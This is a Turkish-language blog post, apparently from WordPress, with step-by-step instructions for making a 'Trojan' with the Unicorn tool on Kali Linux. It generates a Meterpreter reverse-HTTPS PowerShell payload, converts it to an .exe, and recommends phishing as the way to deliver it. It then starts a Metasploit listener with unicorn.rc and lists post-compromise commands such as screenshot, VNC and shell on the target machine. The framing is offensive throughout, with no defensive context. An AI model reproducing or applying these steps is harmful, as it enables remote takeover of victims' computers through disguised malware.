Kali-Linux’ta Unicorn Yazılımı ile Trojan Virüsü oluşturma ve kullanma

Step 1 : Github üzerinden Unicorn yazılımını indiriyoruz.

git clone https://github.com/trustedsec/unicorn

Step 2 :  Unicorn dosyasının içindeki Unicorn.py dosyasını çalıştırıyoruz.

python unicorn.py

Step 3 : Karşımıza gelen çıktıdan, kırmızı kutu içine aldığım payloadı kopyalıyoruz. Tabii ki oradaki IP’ye kendi IP’nizi yazıp, dinleme yapacak olduğunuz portuda kendiniz belirleyebilirsiniz.

Step 4 : IP’mizi ve portumuzu yazdırdıktan sonra komutumuzu çalıştırıyoruz.

python unicorn.py windows/meterpreter/reverse_https <LHOST> <LPORT>

Step 5 : Karşımıza gelen çıktıda, virüsü başarılı bir şekilde oluşturduğumuzu anlıyoruz.

Step 6 : Oluşturulan bu “powershell_attack.txt” dosyası Trojan dosyamız. Dilerseniz Trojanınızı CMD,Powershell vs. uzantılarına çevirip Phishing ile kullanabilirsiniz. Ben bu örneğimizde .exe dosyasına çevirip kullanmayı tercih edeceğim.

Step 7 : powershell_attack.txt” dosyamızı açıp, içindeki “PowerShell” scriptini kopyalıyoruz. Sonra web üzerinden herhangi bir “PowerShell to Exe” dönüşümünü yapan bir web sitesine girip scriptimizi oraya yapıştırıyoruz. Dönüşüm tamamlandığında, “.exe” uzantılı olarak dosyamızı indiriyoruz.

Step 8 : Unicorn klasörünün içinde bulunan “unicorn.rc” dosyasını çalıştırarak direkt olarak dinleme işlemini başlatıyoruz. Trojanımızı oluştururken belirlediğimiz IP’mizi ve port’umuzu otomatik olarak, bu unicorn.rc dosyasının içindeki değerlere yazar.

msfconsole -r unicorn.rc

Step 9 : Ekran görüntüsünden anlayacağınız üzere, LHOST-LPORT gibi değerleri unicorn.rc dosyasından çekti ve bizi uğraştırmadı. Ve Dinleme işlemi başlamış oldu.

Step 10 : Hedefteki bilgisayarda Trojanımız açıldığında, ekranımızda Session oluştuğuna dair bir çıktı görürüz.

Step 11 : Session oluştuğunu gördüğümüzde, ilk olarak “Sessions” komutu ile açılan oturumları listeleyeceğiz. Sonrasında, sistemine erişmek istediğimiz oturumu “Sessions x”(Session ID’si ne ise) yazarak o cihazla bağlantıyı kuracağız.

Step 12 : Meterpreter kod satırına düştüğümüzde ise, ne yapabilecekleriniz sizin hayal gücünüzle alakalı. Birkaç örnek vermek gerekirse;

screenshot
run vnc
shell

0x002

Bir Cevap Yazın

Aşağıya bilgilerinizi girin veya oturum açmak için bir simgeye tıklayın:

WordPress.com Logosu

WordPress.com hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Google fotoğrafı

Google hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Twitter resmi

Twitter hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Facebook fotoğrafı

Facebook hesabınızı kullanarak yorum yapıyorsunuz. Çıkış  Yap /  Değiştir )

Connecting to %s

WordPress.com'da bir web sitesi veya blog oluşturun

Yukarı ↑

%d blogcu bunu beğendi: